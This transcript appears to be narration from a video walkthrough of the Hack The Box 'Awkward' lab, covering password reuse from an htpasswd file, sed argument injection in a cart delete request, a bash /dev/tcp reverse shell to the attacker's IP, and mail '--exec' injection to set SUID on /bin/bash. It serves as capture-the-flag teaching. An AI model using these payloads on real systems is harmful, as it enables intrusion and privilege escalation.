Welcome back, guys. This is the part 2 for awkward machine walkthrough, and in the first part we already get the initial foothold and we logged in as the bean user. Now it's time to do some lateral movement and we will see if we get something interesting and some useful information. With that we can find out any attack vector or attack surface. By that mean we can go and escalate our privileges to the root user or higher authority users, right? So without wasting time, I'm going to start some system enumeration here with, let's say, uname space -a to see which version of the operating system is running on it, on the target. So it is Ubuntu, and let's see how many ports are open, space -tlpn. So bunch of ports open, like port number 3002. We already found that port before. Port number 33060, 3306, this is for SQL, and we also found port number 8080. So I'm going to clear that, and let's go and we will try to visit a web application directory, which is going to be inside where www, let's say ls space -la, and there are few directories. The first one is hackthebox, which we already see. We found some vulnerabilities and weaknesses in the logics, and we already exploited that. The interesting part here is this store directory, because as you can see, this directory is owned by the root user, but the other users have read and execute permission, so we can read the files and we can see the directory inside this store directory. But if we see private directory and .pm2 directory, so we can see the owner of this directory is Christine, and the group is www data, and we don't have any privilege here, right? Similarly for this .pm2 also we don't have any privilege. So my first preference is going to be store, because we already saw many things and we do a lot of enumerations on this particular web application, which is Hat Valley, but we did not perform much enumeration on the subdomain store. And if we go to access store hackthebox.htb, so we can see here it needs authentication, and this authentication is most probably the basic authentication, right? So, and if we cancel this, we can see it's giving us 401 authorization required, and that's running on NGINX. So we can go and we can try to search how to configure basic authentication in NGINX, right? Because I basically know how we can do that, but everything is going to be start from the beginning, and sometime maybe you encountered things which is new for you. So at that instant, Google is going to be your best friend, and keep searching and keep reading, keep learning. So here you can see there is a configuration of NGINX to configure the basic authentication. So I'm going to open this, and also I'm going to open this one, and let's see what we get here. Okay, so here it's saying the prerequisites is going to be NGINX Plus or NGINX open source, password file creation utilities such as Apache 2 util or HTTPD tool. It depends on which version of operating system, Linux operating system you are using, which flavor of Linux operating system. So it is pretty clear here that you need to create the htpasswd file inside. If you are using Apache 2, so it's going to be inside etc/Apache 2, and if it is NGINX, so I think that's going to be the same path, but here instead of Apache 2 it is gonna be nginx. Okay, so let's go to the second link, and here you can see we need to create the username / password, and it is going to be configured inside this directory, inside etc nginx config.d, and inside that directory you need to create htpasswd file. So let's go, and first of all let's see if there is anything like this here /etc nginx conf.d, and let's see htpassword is there, tab. No, let's try to list the files and directories, and yeah, there is htpasswd file with dot, that means this file is hidden. So back here I'm going to use cat command and here dot htpasswd. So here we found the username and the hash value of the password. For me it was uncrackable. What we can try here, and what useful information here is this username, which is admin, because in the previous part of this machine walkthrough we try different username and password, and we also try this credential bean.hill or bean with this password, but that didn't work. So I'm going to copy this password and come back here. Instead of bean user, I'm using username as admin, and let's paste the password for bean, because password reuse is the very common mistake done by administrators in the configuration section. So let's use the bean password here and sign in, and as you can see it is going to authenticate us now. So now we are in the store application, and this is some kind of shopping site, because you can see the options here, like we are already in home, but there is shop and cart and checkout. So if I go to click shop, you can see here there are 3 items which we can select, and there is one option which is cart. So if we try to cart, or if we click to my cart, both redirects you to the same page, and checkout to actually check out your order, but up to now this feature is not enabled. This is the first thing. Okay, let's see. As I mentioned here that our interest is for a store, so I want to enumerate this particular directory, which is store ls -la, and as you can see the files and directories here is for this application: cart, shop, checkout. So here you find a directory which is cart, so we will see that in a minute. Cart.php, we will see also this one, checkout.php. I think these are the pages. Okay, and this is for the logic. Index.php, product details, so we will see that also, and readme.md, shop.php. Shop.php, actually this particular link, when you click on shop you will access shop.php, right? Okay, so the first thing I'm going to start with the product details. Let's see what's inside this. So ls -la, product details, and there are 3 files, file 1, file 2, and this is the file 3. Let's see what's inside file 1. So cat inside product details 1.txt, hit enter. So as you can see, this is the product, and item number 1, and item name is yellow beanie. If we come back to the store application, here you can see there is yellow beanie. So this product is known as yellow beanie. This is the product name, and this is the product price, which you can see here. So that means we saw before that SQL port is open but I don't know, that comes from SQL database or it's saving in the file. Okay, the next part is, let's see, maybe readme files are always important for any project or any uh, web description or any tool description, because a lot of information you will find here inside readme.md. So do not ignore these kind of files from where you can get the information, and even before engaging with the target, reconnaissance and enumeration is the key. And after you get the initial foothold, make sure you enumerate the target well and gather as much information as you can, because all those information is very very necessary to get attack surfaces. So let's read cat readme.md, and here you can see there are few points mentioned for to do. So the first point is waiting for SQL database to be set up and using offline files for now. Will merge with database once the database is set up. So that means SQL database is not set up to now, and it's using offline files. So what you see here, these are the product files where the product information is saved. So they are actually waiting for the database to be set up, and then they will merge all this information inside the database or with the database. So this is the first point. Second point is implement checkout system. We already saw that if we try to go to checkout, we see that this function or this feature up to now not enabled, and then they will also link that feature with the credit card. Okay, not a big deal. Implement shop filters. Not sure about this. Maybe shop filters, maybe there are bunch of products and you can filter the products by the price range or maybe by the product category, something like this. So we cannot also see here any filter from where we can filter the products. Okay. The fourth one is get full catalog of items. The second section here is how to add new catalog item. This is important note. Please leave the header of first line. First line means this line. Okay. This is used to verify it as a valid Hat Valley product. So any product that contains this header is going to be considered as the Hat Valley authenticated product. Otherwise the product will not be processed. Fine. And as you can see here, as existing item from product details, we already see it, and it is going to be pasted in the same folder, changing the name to reflect a new product ID. Fine, so that's perfect. Here in the bottom there is one more message. So right now the user's cart is stored within the /cart directory. That means any user try to add any product in the cart, so the product is going to be added in the cart directory, and right now the cart directory is empty. So if I say ls space -la cart, so there is nothing inside cart, and is named according to the user's session ID. So whatever product user is going to add into the cart, the product name or the product is going to be saved inside the cart by the session ID. So let's try to do this one. So I'm going to add here this product in the cart, and as you can see the item is successfully added. Come back here, let's list the files and directories inside cart. So now as you can see this item is added and this is my session ID. Fine. So I'm going to copy this, come back here. It's always good to note down the information you get, and if we try to see what's inside this product, what we add, so you can see the same product information is added, and this is basically coming from this file. So you can see this information is same and this information is same. Let's see what's inside cart_action.php. So I'm going to clear it and cat cart_action.php. So store home, and this is the root directory of this application. So the first thing is going to be validate the hat value store item, and what we saw in the readme.md file, that it is going to check the item authenticity by the first line of the file from any product details like one.txt. So we saw before this one. So that means whatever product we are going to add, if that product does not contain this string or this line, it is going to be unauthenticated. Okay, and the first logic here to add any item or any product in the card. So this is going to be the post request. This is the first thing, and action, item, and user. So user, because it is going to add the product in the cart by the user session ID name. Okay, and it is going to sanitize all these inputs. So no hacking allowed. Okay, fine. User ID. Now this is the important section where it is going to check the valid item. So store home, we already see that here, store home, this variable. So this variable is going to see the product details directory, and inside product details directory, the files may be 1.txt, 2.txt, 3.txt, whatever file, whatever product you are trying to add. Fine. And here, this is the dangerous function. Don't do much thing. And it's just echoing this. Okay. Let's move to the second portion. And the second logic is for delete from cart. So if you already added a product in the cart and you want to delete that product from the cart, so this is for that. Most of the things are same what I described before in the previous section. Here, this is the thing. Now it's using here sed command. It is taking the item ID, and we can actually control this item ID. That's fine. Let's see. I'm going to copy this whole line and let's just paste that here. Now let's try how we can run commands or something with the sed command. So gtfo bins, this is the best place. Okay, right here sed, and let's see, space -n e. What is e? We need to see that, because here in this command it is already using space -i. So let's try here. Let's see, sed space -h. So it's already using space -i. That means suffix. So edit file in place and makes backup if suffix supplied. Okay. Space -n, where is it? Quiet or silently suppress automatic printing of the pattern space. Space -e. E could work. Why? Because with E we can add expression as a script. So add the script to the commands to be executed. That means by using this switch space -e, we can actually add the script to be executed to the command, right? So we can try this one. Okay, so the first thing is in our perspective, in our mindset, or what we saw up to now, the delete from cart functionality is uh, vulnerable. So let's go, and I'm going to enable the burp proxy here, and let's just add this to the cart. Come back here, go to HTTP history. This is the post request where we actually add this item, right? So item is added successfully. Now back here, and this time I'm going back to my cart, and let's try to delete this item. So if I click delete, back to the burp proxy, and again this is cart action, and inside action we take the action to delete this item, and as you can see there is item number 1 which we want to delete, and this is the user session ID. So we can control this item ID, and this item ID is going to be called here item ID. So item ID is going to be this. Okay, so we can control this, and for that what we need to do here is single quote. Okay, and then we need to use the space hyphen e switch. Okay, and if we go back to the GTF obins, I don't want this. Okay, in the GTF obins we can see this is going to be the way. Okay, we can try something like this, but with the space hyphen e switch. So back here, and then space hyphen e switch comes into the picture, and then 1e slash dev slash shm slash, let's say I will try to create a file, bash file named as hell.sh. Let's say dev slash shm slash hell.sh, right? So this is going to be our item ID. Fine. So first of all, let's go back here. I'm going to clear this, and nano slash dev slash shm slash hell.sh. Okay, we need to create a bash file, so shebang is going to be bin bash, and then let's say I'm going to get reverse shell, so bash space hyphen I greater than and slash dev slash tcp slash 10.10.14.204. this is my IP slash 4545 0 greater than and 1, right? So I will try to take the reverse shell, control X, cat slash dev slash shm slash hell.sh. It's okay, fine. Now we already mentioned here the same path, right? Okay, so now let's just take this, copy, come back here. But one thing to be noticed here, I'm going to start here netcat listener, so nc space hyphen nlvp on port number 4545, hit enter and come back here. So the first thing, let's just start the burp proxy, make it okay. Okay, now on fly I need to change this value on fly from the delete action, right? So we must turn on the intercept, and now let's back to the shop. Okay, just turn off now. First of all we need to add, so let's just add any of these. Let's add this time the second one, back to the cart. Okay, here we have the product But before removing it, make sure you turn on the intercept and your listener is on. Now just click on remove, and here we need to put our payload and make sure you encoded it in the URL and forward this request. So once you forward back to the terminal, let's see if we get any hit. So we did not get anything. Let's see why. That's fine. Cat /dev /shm /hell.sh. I got the problem. You know why we did a blunder? The blunder is file is okay, everything is okay, but we did not provide here the execution permission. Come on, chmod plus x and /dev shm hell.sh, and that's going to be work now. So back here again, let's see if we have any file in the card. Let's just delete this file, rm space -rf. Okay, ls space -la. No file is there. Back to the application. Okay, shop, add the second product. It's added. Now go to the cart. Okay, now turn on the burp proxy and just remove this item. And here we need to put our payload. So that was also okay. Just Control U to URL encoded. And we are already listening right here on 4545. Just forward this request back here, and we got the shell. So now, but the shell is www data. Okay, export term is equal to x term. Clear. What we see here, if we go back to directories, ls space -la, up to now we worked on store, and we leave the private because this directory has ownership of Christine, and only www data can read and execute this. So now because we are www data, so we can go and access this file, this directory. So cd /private and ls space -la. So there is only one file, which is leave request. So if I say cat and let's just paste selection, hit enter. So this is the leave file from all the employees in the company. Okay, they submitted all of these leave requests. So not much interesting here. What I'm going to do, I'm going to cd my op directory, and I think I already have pspy64. Yes, we have it. So python 3 space -m http.server on port number 80, and let's come back here, cd/temp, and here I'm going to wget http:// and 10.10.14.204, okay, /pspy64. Hit enter. So my purpose to download this file on the target is to see the processes which we basically cannot see by just executing ps command. So the file is there. I'm going to give it execution permission, pspy64, clear, and let's just run pspy64. So once we execute this pspy64, you can see here we found something interesting. This process is executed as root user. I'm going to copy it first. Okay, and let's just paste it here. Okay, so now you can see this notify.sh script is executed as root, and what its next step is I notify wait, quiet, monitor, and monitor what? Monitor event. What event? Modify event. And what kind of modify event? Any event, any modify event is going to be monitored quietly if any changes or any modifications will be done in this file. This is the thing, right? So what we can do, I'm going to actually take one more shell here, nc space hyphen nlvp, let's say 4545, or we can change the port, anything we want. This time let's say 7575. I'm going back here again, and let's just go to shop. Okay, come back here, and let's this time add any other product or anything, whatever you want. Go back to your card. Okay, the product is there. Now we need to turn on the intercept and remove this, and here what we need to add this payload. So copy that, come back here and paste it, but make sure you change the port number, or we can try to grab the reverse shell on the same port number, 4545. If you want another port, you can change the hell.sh file. So let's take that and make sure you encode it, URL encoded, forward, and okay, we get here the shell, same like this shell. Okay, now my purpose to show you is what we saw, that just wait a moment, term is equal to xterm clear cd dot slash private and ls space hyphen la, because this file can be accessed by anyone. Oh, this file can be accessed by anyone. So we actually did not need this shell. I thought that this file can be only accessed by Christine or www data, but we can also access it from Wien. But my purpose was to show you this part, this I notify wait, because it is going to monitor any modify event inside this file. So if we change anything inside this file, it is going to notify, and where and how it's going to notify, we don't know. So to actually know that, I'm going to here just make it like that so we can get something. So let's add something, echo, let's say cybersec radar and to this file, paste it, and make sure you see here, you see this window, because once we change, and here as you can see, this event is popped up. So what this event is saying, it is going to notify if any changes come into this file. So it is going to mail, using mail space hyphen s, the leave request, and the changes we make into this file, which is cybersec radar, what I write here. So it is going to notify that okay, there is one change inside this file, and this is the change string, and this message is going to be sent to the root at awkward or .htb or wherever. So the main purpose here, you can see this mail command is executed whenever any modification happened in this file, and this mail command is executed as the root user. So this was my purpose to show you. So I'm going to copy that also, come back here and put it. So after modification we will get this. Let's see, we need to check it inside GTFOBin or somewhere else. So GTFOBin is already open here. I'm going to write here mail, and yes, not sudo shell. So we can execute it like this. Okay, now if we see, I'm going to copy this, come back here, and I'm going to paste it here, and also I'm going to paste this here, copy and paste this here. Fine. So mail command is executed with space hyphen s switch. S is the subject, so subject is not a big deal, this is going to be the subject. So instead of this, if we change something like this, it is going to be executed. Let's say we can try directly put the script here, or we can create one file, put the bash script inside that file, and we mentioned that file here, okay, as it mentioned bin/sh. So what we can do, we can create one more file inside div shm slash let's say well.sh, and inside this file I'm going to say change mod u plus s slash bin slash bash. Okay, let's go and do this. So I'm going to first take this, copy, come back here, and let's go to bean nano and paste that. Okay, slash bin slash bash and chmod u plus s slash bin slash bash. So what actually I'm trying to do here is to set the suid bit permission on this bin slash bash on the bash. So control O, enter, control X, and the mistake we did before, make sure we do not repeat that mistake. So put the execution permission on this file. Now back to your terminal here, and this time what I'm going to do, let's first create the payload here. So I'm going to say echo, and inside echo I'm going to say space hyphen hyphen exec. Exec is going to be equal to and slash div slash shm slash well.sh. Okay, so this is the file we need to mention. So, and we need to append that on this file. So copy that and paste it here. Control C or copy back to the terminal, and here let's just clear everything and just put this command. So whenever we execute that, here we should get mail command should be executed. So, and one more thing I want to mention here, if we come here and let's say ls space hyphen la slash bin slash bash. So as you can see, there is no suid bit set here. So let's just execute first this command. So as we execute, you can see here this is executed, and if we come back here, let's say ls space hyphen la bin slash bash, and as you can see the suid bit is now set. So if we say slash bin slash bash space -p, hit enter, and who am I? I am root. ID is root. Fine, so clear that, and let's go to cd/root ls space -la, and there is root.txt, so we can read root.txt here. That's perfect. So cat root.txt, hit enter, and this is our root flag. So that's it. We solved the lab, we solved the machine, and we are now the root. So if you did not subscribe the channel, please subscribe the channel, and if you like the content, please share it and like it, and if you have any query, please put your query in the comment section. I'm going to see you in the next video. Take care. Bye.